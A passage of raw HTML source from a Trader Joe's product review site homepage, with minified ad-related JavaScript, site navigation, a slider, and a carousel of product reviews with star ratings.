for(k=0;k<f.length;++k)b.sa.push(f[k]);if(!e){f=D(d,M,1);e={};for(k=0;k<f.length;k++)e[A(f[k],4)]=!0;f=null;e[19]||e[8]?f=19:e[16]||e[1]?f=16:0<d.i().length&&0<A(d,3).length&&e[34]&&(f=34);null!=f?(e=new M,B(e,6,3),B(e,4,f),16!=f&&19!=f&&e.qa("pso-ama-fallback")):e=null}(f=!e)||(!p(g)||800>g?f=!1:820>g?(hc(a,["26835111"]),f=!0):(840>g&&hc(a,["26835112"]),f=!1));if(f)return mc(16);(g=e.ka())&&fc(a,g);g=!0; A(c.N(),2)&&(Date.now?Date.now():+new Date)<A(c.N(),2)||(fc(a,"pso-ama-exd"),g=!1);A(b.m,11)&&(fc(a,"pso-ama-stl-tmp"),g=!1);g&&fc(a,"pso-ama-elig");2==A(e,6)&&(b=A(e,1),null!=b&&hc(a,[""+b]));if(g&&(2==A(e,6)||1==A(e,6))){d=D(d,M,1);if(null===c.ja)c=[];else{b={};c=[];for(g=0;g<d.length;g++)f=nc(d[g]),null==f||b[f]||(b[f]=!0,c.push(f));b=nc(e);if(null!=b){d=[];b=gc(b);g=!1;if(b)for(f=0;f<c.length;f++)k=gc(c[f]),b==k&&(g=!0),k&&d.push("950"+b+k);g||(d=[]);c=d}else c=[]}hc(a,c)}a=new Sb;a.ba=A(e,5); a.J=A(e,4);return a},mc=function(a){var b=new Sb;b.J=a;return b},pc=function(a){a=a.google_ad_modifications=a.google_ad_modifications||{};a.remove_ads_by_default=!0;a.ad_whitelist=[{ad_tag_origin:"pso"}];a.ad_blacklist=[];a.space_collapsing="slot"},nc=function(a){var b;switch(A(a,6)){case 1:b=A(a,4);break;case 2:b=A(a,7)}return null!=b?b:null};var qc=function(a){this.document=a};var W=function(a){H.call(this,a)};r(W,H);W.prototype.getData=function(a){var b=W.Ra.getData.call(this,a),c;a:{c=(new qc(a.document)).document.getElementsByTagName("script");for(var d=0;d<c.length;++d)if(c[d].hasAttribute("data-pso-version")){c=c[d].getAttribute("data-pso-version");break a}c=null}b.sv=c;if(d=I(a).ps||null){c=d.m;var d=d.f(),e=b.wpc;b.wpc=null!=e?e:c.A();b.su=A(c,14);b.tn=c.O();b.ev=d&&A(d,5)}if(a=I(a).ss||null)b.s=a.J,b.st=a.ba;return b};var rc=null,sc=!1,vc=function(a){var b=tc,c=uc;b.addEventListener?(a&&b.addEventListener("DOMContentLoaded",a,!1),c&&b.addEventListener("load",c,!1)):b.attachEvent&&c&&b.attachEvent("onload",c)},xc=function(a){p(rc)&&a.clearInterval&&(a.clearInterval(rc),rc=null);sc||wc(a,!1);wc(a,!0)},yc=function(a,b){try{xc(b);var c=I(b).ss||null;if(c&&c.I){var d=c.I,e=d.B(),f=d.o,g=d.v,k=d.Y,m=d.j.length;e||0!=m||f.push(6);for(var l=new W(m),c=0;c<g.length;c++)l.C(g[c]);if(e&&0==f.length&&null===k)ab(a,a.Qa,a.ca, l);else{for(e=0;e<f.length;e++)l.g(f[e]);bb(a,$a(l,k))}}else bb(a,(new W(0)).g(2))}catch(u){bb(a,$a((new W(0)).g(1),u))}I(b).loaded=!0},wc=function(a,b){b||(sc=!0);if((a=I(a).ss||null)&&a.I){a=a.I;try{a.apply(b)}catch(c){a.g(1),null===a.Y&&(a.Y=c)}}},zc=function(){wc(window,!1)};var X=new function(a){this.Qa="pso_success";this.Ea="pso_failure";this.X=this.ca=.01;this.Ha=!1;this.K=a}(window); try{var V=window,za,Ac=I(V).config;za=Ac?new O(Ac):null;if(!za)throw Error("No config");var Bc=Aa(10),Cc=Aa(7);X.ca=null!=Bc?Bc:X.ca;X.X=null!=Cc?Cc:X.X;var kc=new lb(za),Dc=kc;I(V).ps=Dc;var Y,lc;if(v("iPad")||v("Android")&&!v("Mobile")||v("Silk")||!(v("iPod")||v("iPhone")||v("Android")||v("IEMobile")))Y=mc(16);else{var Ec,Fc=/^#([^=]*)=(\d+)$/.exec(V.location.hash);if((Ec=Fc&&3==Fc.length&&"pso_strategy"==Fc[1]?+Fc[2]:null)&&U[Ec]){Y=mc(Ec);var Gc=V;jc(Ec)&&pc(Gc)}else{var Ic=V,Jc=kc.m.N(),Z;try{var Kc= parseInt(Ic.localStorage.getItem("PSO_EXP0"),10);Z=isNaN(Kc)?null:Kc}catch(a){Z=null}if(null==Z){Z=Math.floor(1024*Math.random());var Lc=Z;try{Ic.localStorage.setItem("PSO_EXP0",Lc.toString())}catch(a){}}lc=new ic(Z,0,Jc);Y=oc()}if(1==Y.ba){var Mc=V;jc(Y.J)&&pc(Mc)}}if(!Y)throw Error("No strategyState created!");var Nc=Y;I(V).ss=Nc;var Oc=V,Pc=Y,Qc=Pc.J;if(p(Qc)){var Rc=U[Qc];Qc&&Rc&&(Pc.I=new Rc(Oc))}var tc=V,uc=ba(yc,X,tc),Sc=ba(xc,tc);switch(tc.document.readyState){case "complete":uc();break;case "interactive":Sc(); vc();break;default:var Tc=tc,Uc=pb(Tc);Uc.loaded||(Uc.onload=zc);rc=Tc.setInterval(zc,10);vc(Sc)}}catch(a){bb(X,$a(new W(0),a))};})(); </script></head> <body class="home unknown"> <div id="container"> <div id="content"> <div id="header"> <header> <div class="store-logo"> <a title="Trader Joe&#039;s Reviews" href="http://www.traderjoesreviews.com"><img src="http://www.tjsreviews.com/wp-content/uploads/2014/03/tjslogo20141.png"/></a> </div> <!-- Search Begin --> <div class="search-container"> <form action="http://www.traderjoesreviews.com" method="get"> <input type="text" name="s" class="search-field" value="Search..." onfocus="if(this.value=='Search...'){this.value=''};" onblur="if(this.value==''){this.value='Search...'};"> <input type="hidden" name="post_type" value="product" /> <input type="submit" class="search-btn" value="" id="s_submit"> </form> </div> <!-- Search End --> </header> </div> <!-- Navigation Begin --> <div class="navigation-outer"> <div class="navigation"> <nav> <ul id="main-menu" class="sf-menu"><li id="menu-item-3240" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children sfish-navgiation-item menu-item-3240"><a href="http://www.traderjoesreviews.com/product-category/all-products/?orderby=rating">Product Reviews</a> <ul class="sub-menu"> <li id="menu-item-6835" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-6835"><a href="http://www.traderjoesreviews.com/product-category/all-products/desserts/">Desserts</a></li> <li id="menu-item-423" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-423"><a href="http://www.traderjoesreviews.com/product-category/all-products/frozen-food/">Frozen Food</a></li> <li id="menu-item-6832" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-6832"><a href="http://www.traderjoesreviews.com/product-category/all-products/household/">Household</a></li> <li id="menu-item-6833" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-6833"><a href="http://www.traderjoesreviews.com/product-category/all-products/salsa-dips-sauces/">Salsa, Dips &#038; Sauces</a></li> <li id="menu-item-6834" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-6834"><a href="http://www.traderjoesreviews.com/product-category/all-products/snacks/">Snacks</a></li> <li id="menu-item-6831" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-6831"><a href="http://www.traderjoesreviews.com/product-category/all-products/vitamins-supplements/">Vitamins &#038; Supplements</a></li> <li id="menu-item-3241" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3241"><a href="http://www.traderjoesreviews.com/product-category/all-products/?orderby=rating">All</a></li> </ul> </li> <li id="menu-item-130" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-130"><a href="http://www.traderjoesreviews.com/category/trader-joes-recipes/">Recipes</a></li> <li id="menu-item-3181" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3181"><a href="http://www.traderjoesreviews.com/product-category/all-products/?orderby=rating">Best Of</a></li> <li id="menu-item-3182" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3182"><a href="http://www.traderjoesreviews.com/trader-joes-locations/">Trader Joe&#8217;s Locations</a></li> <li id="menu-item-565" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children sfish-navgiation-item menu-item-565"><a href="http://www.traderjoesreviews.com/trader-joes-information/">Trader Joe&#8217;s Information</a> <ul class="sub-menu"> <li id="menu-item-569" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-569"><a href="http://www.traderjoesreviews.com/trader-joes-locations/">Trader Joe&#8217;s Locations</a></li> <li id="menu-item-568" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-568"><a href="http://www.traderjoesreviews.com/trader-joes-information/trader-joes-hours/">Trader Joe&#8217;s Hours</a></li> <li id="menu-item-2309" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2309"><a href="http://www.traderjoesreviews.com/trader-joes-information/trader-joes-return-policy/">Trader Joe&#8217;s Return Policy</a></li> <li id="menu-item-567" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-567"><a href="http://www.traderjoesreviews.com/trader-joes-information/trader-joes-delivery/">Trader Joe&#8217;s Delivery</a></li> <li id="menu-item-566" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-566"><a href="http://www.traderjoesreviews.com/trader-joes-information/trader-joes-donations/">Trader Joe&#8217;s Donations</a></li> <li id="menu-item-6338" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-6338"><a href="http://www.traderjoesreviews.com/trader-joes-job-application/">Trader Joe&#8217;s Job Application</a></li> </ul> </li> <li id="menu-item-83" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-83"><a href="http://www.traderjoesreviews.com/blogpage/">Blog</a></li> </ul> </nav> </div> <div class="navigation-shadow"></div> </div> <!-- Navigation End --> <div class="clear"></div> <!-- Slider Begin --> <!-- START REVOLUTION SLIDER 4.6.0 responsitive mode --> <style type='text/css'> #rev_slider_1_1, #rev_slider_1_1_wrapper { width:960px; height:350px;} @media only screen and (min-width: 940px) { #rev_slider_1_1, #rev_slider_1_1_wrapper { width:960px; height:350px;} } @media only screen and (min-width: 780px) and (max-width: 939px) { #rev_slider_1_1, #rev_slider_1_1_wrapper { width:770px; height:280px;} } @media only screen and (min-width: 510px) and (max-width: 779px) { #rev_slider_1_1, #rev_slider_1_1_wrapper { width:500px; height:182px;} } @media only screen and (min-width: 0px) and (max-width: 509px) { #rev_slider_1_1, #rev_slider_1_1_wrapper { width:310px; height:113px;} } </style> <div id="rev_slider_1_1_wrapper" class="rev_slider_wrapper" style="margin:0px auto;background-color:#E9E9E9;padding:2px;margin-top:0px;margin-bottom:0px;"> <div id="rev_slider_1_1" class="rev_slider" style="display:none;"> <ul> <!-- SLIDE --> <li data-transition="fade" data-slotamount="7" data-masterspeed="300" data-link="http://www.traderjoesreviews.com/category/trader-joes-recipes/" data-saveperformance="off" > <!-- MAIN IMAGE --> <img src="http://www.tjsreviews.com/wp-content/uploads/2014/07/tjsslider2.jpg" alt="tjsslider2" data-bgposition="center top" data-bgfit="cover" data-bgrepeat="no-repeat"> <!-- LAYERS --> </li> <!-- SLIDE --> <li data-transition="fade" data-slotamount="7" data-masterspeed="300" data-link="http://www.traderjoesreviews.com/product-category/all-products/" data-saveperformance="off" > <!-- MAIN IMAGE --> <img src="http://www.tjsreviews.com/wp-content/uploads/2014/07/tjsslider1.jpg" alt="tjsslider1" data-bgposition="center top" data-bgfit="cover" data-bgrepeat="no-repeat"> <!-- LAYERS --> </li> <!-- SLIDE --> <li data-transition="fade" data-slotamount="7" data-masterspeed="300" data-link="http://www.traderjoesreviews.com/best-trader-joes-salads/" data-saveperformance="off" > <!-- MAIN IMAGE --> <img src="http://www.tjsreviews.com/wp-content/uploads/2014/07/tjsslider3.jpg" alt="tjsslider3" data-bgposition="center top" data-bgfit="cover" data-bgrepeat="no-repeat"> <!-- LAYERS --> </li> <!-- SLIDE --> <li data-transition="fade" data-slotamount="7" data-masterspeed="300" data-link="/trader-joes-dietary-restriction-products/" data-saveperformance="off" > <!-- MAIN IMAGE --> <img src="http://www.tjsreviews.com/wp-content/uploads/2014/07/tjsslider4.jpg" alt="tjsslider4" data-bgposition="center top" data-bgfit="cover" data-bgrepeat="no-repeat"> <!-- LAYERS --> </li> </ul> </div> <script type="text/javascript"> /****************************************** - PREPARE PLACEHOLDER FOR SLIDER - ******************************************/ var setREVStartSize = function() { var tpopt = new Object(); tpopt.startwidth = 960; tpopt.startheight = 350; tpopt.container = jQuery('#rev_slider_1_1'); tpopt.fullScreen = "off"; tpopt.forceFullWidth="off"; tpopt.container.closest(".rev_slider_wrapper").css({height:tpopt.container.height()});tpopt.width=parseInt(tpopt.container.width(),0);tpopt.height=parseInt(tpopt.container.height(),0);tpopt.bw=tpopt.width/tpopt.startwidth;tpopt.bh=tpopt.height/tpopt.startheight;if(tpopt.bh>tpopt.bw)tpopt.bh=tpopt.bw;if(tpopt.bh<tpopt.bw)tpopt.bw=tpopt.bh;if(tpopt.bw<tpopt.bh)tpopt.bh=tpopt.bw;if(tpopt.bh>1){tpopt.bw=1;tpopt.bh=1}if(tpopt.bw>1){tpopt.bw=1;tpopt.bh=1}tpopt.height=Math.round(tpopt.startheight*(tpopt.width/tpopt.startwidth));if(tpopt.height>tpopt.startheight&&tpopt.autoHeight!="on")tpopt.height=tpopt.startheight;if(tpopt.fullScreen=="on"){tpopt.height=tpopt.bw*tpopt.startheight;var cow=tpopt.container.parent().width();var coh=jQuery(window).height();if(tpopt.fullScreenOffsetContainer!=undefined){try{var offcontainers=tpopt.fullScreenOffsetContainer.split(",");jQuery.each(offcontainers,function(e,t){coh=coh-jQuery(t).outerHeight(true);if(coh<tpopt.minFullScreenHeight)coh=tpopt.minFullScreenHeight})}catch(e){}}tpopt.container.parent().height(coh);tpopt.container.height(coh);tpopt.container.closest(".rev_slider_wrapper").height(coh);tpopt.container.closest(".forcefullwidth_wrapper_tp_banner").find(".tp-fullwidth-forcer").height(coh);tpopt.container.css({height:"100%"});tpopt.height=coh;}else{tpopt.container.height(tpopt.height);tpopt.container.closest(".rev_slider_wrapper").height(tpopt.height);tpopt.container.closest(".forcefullwidth_wrapper_tp_banner").find(".tp-fullwidth-forcer").height(tpopt.height);} }; /* CALL PLACEHOLDER */ setREVStartSize(); var tpj=jQuery; tpj.noConflict(); var revapi1; tpj(document).ready(function() { if(tpj('#rev_slider_1_1').revolution == undefined) revslider_showDoubleJqueryError('#rev_slider_1_1'); else revapi1 = tpj('#rev_slider_1_1').show().revolution( { dottedOverlay:"none", delay:6000, startwidth:960, startheight:350, hideThumbs:200, thumbWidth:100, thumbHeight:50, thumbAmount:4, simplifyAll:"off", navigationType:"bullet", navigationArrows:"solo", navigationStyle:"round", touchenabled:"on", onHoverStop:"on", nextSlideOnWindowFocus:"off", swipe_threshold: 0.7, swipe_min_touches: 1, drag_block_vertical: false, keyboardNavigation:"off", navigationHAlign:"center", navigationVAlign:"bottom", navigationHOffset:0, navigationVOffset:20, soloArrowLeftHalign:"left", soloArrowLeftValign:"center", soloArrowLeftHOffset:20, soloArrowLeftVOffset:0, soloArrowRightHalign:"right", soloArrowRightValign:"center", soloArrowRightHOffset:20, soloArrowRightVOffset:0, shadow:1, fullWidth:"off", fullScreen:"off", spinner:"spinner0", stopLoop:"off", stopAfterLoops:-1, stopAtSlide:-1, shuffle:"off", hideThumbsOnMobile:"off", hideNavDelayOnMobile:1500, hideBulletsOnMobile:"off", hideArrowsOnMobile:"off", hideThumbsUnderResolution:0, hideSliderAtLimit:0, hideCaptionAtLimit:0, hideAllCaptionAtLilmit:0, startWithSlide:0 }); }); /*ready*/ </script> </div><!-- END REVOLUTION SLIDER --> <div class="clear"></div> <div class="content-wrapper home-content-wrapper"> <article> <!-- Home Wide Sidebar --> <div class="home-wide"> <div id="products-widget-2" class="widget home-widget products slider-container"> <h2>Reviews</h2> <div id="woo-product-items" class="products grid-view list-carousel responsive"> <ul id="foo1" class="products products-carousel"> <script type="text/javascript"> /*global jQuery:false */ jQuery(document).ready(function($) { "use strict"; // Products Carousel $('#foo1').carouFredSel({ responsive: true, auto: false, width: '100%', scroll: { items : 2, pauseOnHover : true }, prev: '#prev1', next: '#next1', pagination: "#pager1", items: { width: 250, height: 'auto', visible: { min: 2, max: 4 } } }); }); </script> <li class="product-grid-container"> <div class="product-item"> <div class="title"> <h3 class="title-container product-titles"><a href="http://www.traderjoesreviews.com/product/trader-joes-eggplant-with-tomatoes-onions-reviews/">Trader Joe&#8217;s Grecian Style Eggplant With Tomatoes &#038; Onions Reviews</a></h3> </div> <div class="image mosaic-block bar"> <a href="http://www.traderjoesreviews.com/product/trader-joes-eggplant-with-tomatoes-onions-reviews/"> <span class="price heading-style"></span> <img src="http://www.traderjoesreviews.com/wp-content/uploads/2015/03/eggplant-tomatoes-onions-150x150.jpg" alt="" /> </a> </div> <div class="info"> <div class="float-left"> <div class="star-rating" title="Rated 4.73 out of 5"><span style="width:94.6%"><strong class="rating">4.73</strong> out of 5</span></div> </div> <div class="float-right"> <a href="http://www.traderjoesreviews.com/product/trader-joes-eggplant-with-tomatoes-onions-reviews/" rel="nofollow" data-product_id="3289" data-product_sku="" class="button product_type_simple">Read more</a> </div> </div> </div> </li> <li class="product-grid-container"> <div class="product-item"> <div class="title"> <h3 class="title-container product-titles"><a href="http://www.traderjoesreviews.com/product/trader-joes-veggies-greens-salad-kit-reviews/">Trader Joe’s Veggies &#038; Greens Salad Kit Reviews</a></h3> </div> <div class="image mosaic-block bar"> <a href="http://www.traderjoesreviews.com/product/trader-joes-veggies-greens-salad-kit-reviews/" class="mosaic-overlay"> <div class="details"> <p>Chopped broccoli, shaved cauliflower, shaved Brussels sprouts, radicchio, kale, and green cabbage.</p> </div> </a> <a href="http://www.traderjoesreviews.com/product/trader-joes-veggies-greens-salad-kit-reviews/"> <span class="price heading-style"></span> <img src="http://www.traderjoesreviews.com/wp-content/uploads/2017/12/veggies-greens-salad-kit-150x150.jpg" alt="" /> </a> </div> <div class="info"> <div class="float-left"> <div class="star-rating" title="Rated 5 out of 5"><span style="width:100%"><strong class="rating">5</strong> out of 5</span></div> </div> <div class="float-right"> <a href="http://www.traderjoesreviews.com/product/trader-joes-veggies-greens-salad-kit-reviews/" rel="nofollow" data-product_id="8799" data-product_sku="" class="button product_type_simple">Read more</a> </div> </div> </div> </li> <li class="product-grid-container"> <div class="product-item"> <div class="title"> <h3 class="title-container product-titles"><a href="http://www.traderjoesreviews.com/product/trader-joes-breaded-chicken-tenderloin-breasts-reviews/">Trader Joe&#8217;s Breaded Chicken Tenderloin Breasts Reviews</a></h3> </div> <div class="image mosaic-block bar"> <a href="http://www.traderjoesreviews.com/product/trader-joes-breaded-chicken-tenderloin-breasts-reviews/"> <span class="price heading-style"></span> <img src="http://www.traderjoesreviews.com/wp-content/uploads/2015/03/breaded-chicken-tenderloin-breasts-150x150.jpg" alt="" /> </a> </div> <div class="info"> <div class="float-left"> <div class="star-rating" title="Rated 3.8 out of 5"><span style="width:76%"><strong class="rating">3.8</strong> out of 5</span></div> </div> <div class="float-right"> <a href="http://www.traderjoesreviews.com/product/trader-joes-breaded-chicken-tenderloin-breasts-reviews/" rel="nofollow" data-product_id="3376" data-product_sku="" class="button product_type_simple">Read more</a> </div> </div> </div> </li> <li class="product-grid-container"> <div class="product-item"> <div class="title"> <h3 class="title-container product-titles"><a href="http://www.traderjoesreviews.com/product/trader-joes-garlic-spread-dip-reviews/">Trader Joe&#8217;s Garlic Spread &#038; Dip Reviews</a></h3> </div> <div class="image mosaic-block bar"> <a href="http://www.traderjoesreviews.com/product/trader-joes-garlic-spread-dip-reviews/"> <span class="price heading-style"></span> <img src="http://www.traderjoesreviews.com/wp-content/uploads/2016/12/garlic-spread-dip-150x150.jpg" alt="" /> </a> </div> <div class="info"> <div class="float-left"> <div class="star-rating" title="Rated 4.63 out of 5"><span style="width:92.6%"><strong class="rating">4.63</strong> out of 5</span></div> </div> <div class="float-right"> <a href="http://www.traderjoesreviews.com/product/trader-joes-garlic-spread-dip-reviews/" rel="nofollow" data-product_id="7775" data-product_sku="" class="button product_type_simple">Read more</a> </div> </div> </div> </li> <li class="product-grid-container"> <div class="product-item"> <div class="title"> <h3 class="title-container product-titles"><a href="http://www.traderjoesreviews.com/product/trader-joes-grump-tree-reviews/">Trader Joe&#8217;s Grump Tree Reviews</a></h3> </div> <div class="image mosaic-block bar"> <a href="http://www.traderjoesreviews.com/product/trader-joes-grump-tree-reviews/"> <span class="price heading-style"></span> <img src="http://www.traderjoesreviews.com/wp-content/uploads/2017/12/grump-tree-150x150.jpg" alt="" /> </a> </div> <div class="info"> <div class="float-left"> <div class="star-rating" title="Rated 2.63 out of 5"><span style="width:52.6%"><strong class="rating">2.63</strong> out of 5</span></div> </div> <div class="float-right"> <a href="http://www.traderjoesreviews.com/product/trader-joes-grump-tree-reviews/" rel="nofollow" data-product_id="8797" data-product_sku="" class="button product_type_simple">Read more</a> </div> </div> </div> </li> <li class="product-grid-container"> <div class="product-item"> <div class="title"> <h3 class="title-container product-titles"><a href="http://www.traderjoesreviews.com/product/trader-joes-spiral-sliced-uncured-hams-reviews/">Trader Joe&#8217;s Spiral Sliced Uncured Ham Reviews</a></h3> </div> <div class="image mosaic-block bar"> <a href="http://www.traderjoesreviews.com/product/trader-joes-spiral-sliced-uncured-hams-reviews/"> <span class="price heading-style"></span> <img src="http://www.traderjoesreviews.com/wp-content/uploads/2014/11/spiralsliceduncuredham-150x150.jpg" alt="" /> </a> </div> <div class="info"> <div class="float-left"> <div class="star-rating" title="Rated 3.22 out of 5"><span style="width:64.4%"><strong class="rating">3.22</strong> out of 5</span></div> </div> <div class="float-right"> <a href="http://www.traderjoesreviews.com/product/trader-joes-spiral-sliced-uncured-hams-reviews/" rel="nofollow" data-product_id="2816" data-product_sku="" class="button product_type_simple">Read more</a> </div> </div> </div> </li> <li class="product-grid-container"> <div class="product-item"> <div class="title"> <h3 class="title-container product-titles"><a href="http://www.traderjoesreviews.com/product/trader-joes-boozy-little-chocolate-truffles-reviews/">Trader Joe&#8217;s Boozy Little Chocolate Truffles Reviews</a></h3> </div> <div class="image mosaic-block bar"> <a href="http://www.traderjoesreviews.com/product/trader-joes-boozy-little-chocolate-truffles-reviews/" class="mosaic-overlay"> <div class="details"> <p>Flavored with London gin, Scotch whisky, Navy rum, and Prosecco.</p> </div> </a> <a href="http://www.traderjoesreviews.com/product/trader-joes-boozy-little-chocolate-truffles-reviews/"> <span class="price heading-style"></span> <img src="http://www.traderjoesreviews.com/wp-content/uploads/2017/12/boozy-chocolate-truffles-150x150.jpg" alt="" /> </a> </div> <div class="info"> <div class="float-left"> <div class="star-rating" title="Rated 5 out of 5"><span style="width:100%"><strong class="rating">5</strong> out of 5</span></div> </div> <div class="float-right"> <a href="http://www.traderjoesreviews.com/product/trader-joes-boozy-little-chocolate-truffles-reviews/" rel="nofollow" data-product_id="8764" data-product_sku="" class="button product_type_simple">Read more</a> </div> </div> </div> </li> <li class="product-grid-container"> <div class="product-item"> <div class="title"> <h3 class="title-container product-titles"><a href="http://www.traderjoesreviews.com/product/trader-joes-frozen-mashed-potatoes-reviews/">Trader Joe&#8217;s Frozen Mashed Potatoes Reviews</a></h3> </div> <div class="image mosaic-block bar"> <a href="http://www.traderjoesreviews.com/product/trader-joes-frozen-mashed-potatoes-reviews/"> <span class="price heading-style"></span> <img src="http://www.traderjoesreviews.com/wp-content/uploads/2014/05/mashedpotatoes-150x150.png" alt="" /> </a> </div> <div class="info"> <div class="float-left"> <div class="star-rating" title="Rated 4.27 out of 5"><span style="width:85.4%"><strong class="rating">4.27</strong> out of 5</span></div> </div> <div class="float-right"> <a href="http://www.traderjoesreviews.com/product/trader-joes-frozen-mashed-potatoes-reviews/" rel="nofollow" data-product_id="683" data-product_sku="" class="button product_type_simple">Read more</a> </div> </div> </div> </li> <li class="product-grid-container"> <div class="product-item"> <div class="title"> <h3 class="title-container product-titles"><a href="http://www.traderjoesreviews.com/product/trader-joes-turkey-bone-broth-reviews/">Trader Joe&#8217;s Turkey Bone Broth Reviews</a></h3> </div> <div class="image mosaic-block bar"> <a href="http://www.traderjoesreviews.com/product/trader-joes-turkey-bone-broth-reviews/"> <span class="price heading-style"></span> <img src="http://www.traderjoesreviews.com/wp-content/uploads/2016/11/turkey-bone-broth-150x150.jpg" alt="" /> </a> </div> <div class="info"> <div class="float-left"> <div class="star-rating" title="Rated 4.67 out of 5"><span style="width:93.4%"><strong class="rating">4.67</strong> out of 5</span></div> </div> <div class="float-right"> <a href="http://www.traderjoesreviews.com/product/trader-joes-turkey-bone-broth-reviews/" rel="nofollow" data-product_id="7349" data-product_sku="" class="button product_type_simple">Read more</a> </div> </div> </div> </li> <li class="product-grid-container"> <div class="product-item"> <div class="title"> <h3 class="title-container product-titles"><a href="http://www.traderjoesreviews.com/product/trader-joes-zucchini-fritters-reviews/">Trader Joe&#8217;s Zucchini Fritters Reviews</a></h3> </div> <div class="image mosaic-block bar"> <a href="http://www.traderjoesreviews.com/product/trader-joes-zucchini-fritters-reviews/"> <span class="price heading-style"></span> <img src="http://www.traderjoesreviews.com/wp-content/uploads/2017/09/zucchini-fritters-150x150.jpg" alt="" /> </a> </div> <div class="info"> <div class="float-left"> <div class="star-rating" title="Rated 3.89 out of 5"><span style="width:77.8%"><strong class="rating">3.89</strong> out of 5</span></div> </div> <div class="float-right"> <a href="http://www.traderjoesreviews.com/product/trader-joes-zucchini-fritters-reviews/" rel="nofollow" data-product_id="8516" data-product_sku="" class="button product_type_simple">Read more</a> </div> </div> </div> </li> <li class="product-grid-container"> <div class="product-item"> <div class="title"> <h3 class="title-container product-titles"><a href="http://www.traderjoesreviews.com/product/trader-joes-zhoug-sauce-reviews/">Trader Joe&#8217;s Zhoug Sauce Reviews</a></h3> </div> <div class="image mosaic-block bar"> <a href="http://www.traderjoesreviews.com/product/trader-joes-zhoug-sauce-reviews/" class="mosaic-overlay"> <div class="details"> <p>A spicy green condiment made with cilantro, jalapeno, and garlic.</p> </div> </a> <a href="http://www.traderjoesreviews.com/product/trader-joes-zhoug-sauce-reviews/"> <span class="price heading-style"></span> <img src="http://www.traderjoesreviews.com/wp-content/uploads/2017/12/zhoug-sauce-150x150.jpg" alt="" /> </a> </div> <div class="info"> <div class="float-left"> <div class="star-rating" title="Rated 4.64 out of 5"><span style="width:92.8%"><strong class="rating">4.64</strong> out of 5</span></div> </div> <div class="float-right"> <a href="http://www.traderjoesreviews.com/product/trader-joes-zhoug-sauce-reviews/" rel="nofollow" data-product_id="8830" data-product_sku="" class="button product_type_simple">Read more</a> </div> </div> </div> </li> <li class="product-grid-container"> <div class="product-item"> <div class="title"> <h3 class="title-container product-titles"><a href="http://www.traderjoesreviews.com/product/trader-joes-rose-water-facial-toner-reviews/">Trader Joe&#8217;s Rose Water Facial Toner Reviews</a></h3> </div> <div class="image mosaic-block bar"> <a href="http://www.traderjoesreviews.com/product/trader-joes-rose-water-facial-toner-reviews/"> <span class="price heading-style"></span> <img src="http://www.traderjoesreviews.com/wp-content/uploads/2018/02/rose-water-facial-toner-150x150.jpg" alt="" /> </a> </div> <div class="info"> <div class="float-left"> <div class="star-rating" title="Rated 2.67 out of 5"><span style="width:53.4%"><strong class="rating">2.67</strong> out of 5</span></div> </div> <div class="float-right"> <a href="http://www.traderjoesreviews.com/product/trader-joes-rose-water-facial-toner-reviews/" rel="nofollow" data-product_id="8903" data-product_sku="" class="button product_type_simple">Read more</a> </div> </div> </div> </li> </ul> <div id="pager1" class="pager"></div> <div class="clear"></div> </div></div> </div> <div class="clear"></div> <!-- Narrow Sidebar 1 --> <div class="one-half float-left"> </div> <!-- Narrow Sidebar 2 --> <div class="one-half last float-left"> </div> <div class="clear"></div> <!-- Home Content --> <div id="home_special"> <div class="sep-line-block"> <div class="sep-line-points-container"> <div class="sep-line-points"></div> </div> <div class="sep-line-center-text"> <a href="http://traderjoesreviews.com/product-category/all-products/" class="button red-submit-button">See All Trader Joe's Reviews</a> </div> <div class="sep-line-points-container"> <div class="sep-line-points"></div> </div> </div> <div class="clear"></div> </div> </article> </div> </div> <!-- Footer --> <div id="footer"> <footer> <div class="footer-inner"> <div class="one-fifth float-left"> <div id="socialicons-widget-3" class="widget footer-widget socialicons"> <h3 class="widget-title">Connect</h3> <ul class="social-icons"> <li class="social twitter"><a href="http://www.twitter.com/traderjsreviews">twitter</a></li> <li class="social facebook"><a href="https://www.facebook.com/pages/Trader-Joes-Reviews/690106934379032">facebook</a></li> </ul> <div class="clear"></div></div> <div id="text-5" class="widget footer-widget widget_text"> <div class="textwidget"><p>Not affiliated with Trader Joe&#8217;s</p> </div> <div class="clear"></div></div><div id="text-6" class="widget footer-widget widget_text"> <div class="textwidget"><p><a href="http://www.traderjoesreviews.com/privacy-policy/">Privacy Policy</a></p> </div> <div class="clear"></div></div> </div> <div class="one-fifth last float-left"> &nbsp; </div> <div class="one-fifth float-left"> <div id="search-4" class="widget footer-widget widget_search"><h3 class="widget-title">Search</h3><form role="search" method="get" id="searchform" class="searchform" action="http://www.traderjoesreviews.com/"> <div> <label class="screen-reader-text" for="s">Search for:</label> <input type="text" value="" name="s" id="s" /> <input type="submit" id="searchsubmit" value="Search" /> </div> </form><div class="clear"></div></div><div id="text-3" class="widget footer-widget widget_text"><h3 class="widget-title">Popular Searches</h3> <div class="textwidget"><p><a href="http://www.traderjoesreviews.com/?s=pumpkin&amp;post_type=product">Pumpkin</a> | <a href="http://www.traderjoesreviews.com/?s=honey&amp;post_type=product">Honey</a> | <a href="http://www.traderjoesreviews.com/?s=Turkey&amp;post_type=product">Turkey</a> | <a href="http://www.traderjoesreviews.com/?s=pickle+popcorn&amp;post_type=product">Pickle Popcorn</a></p> </div> <div class="clear"></div></div> </div> <div class="one-fifth last float-left"> &nbsp; </div> <div class="one-fifth last float-left"> <div id="recent-posts-3" class="widget footer-widget widget_recent_entries"> <h3 class="widget-title">Recent 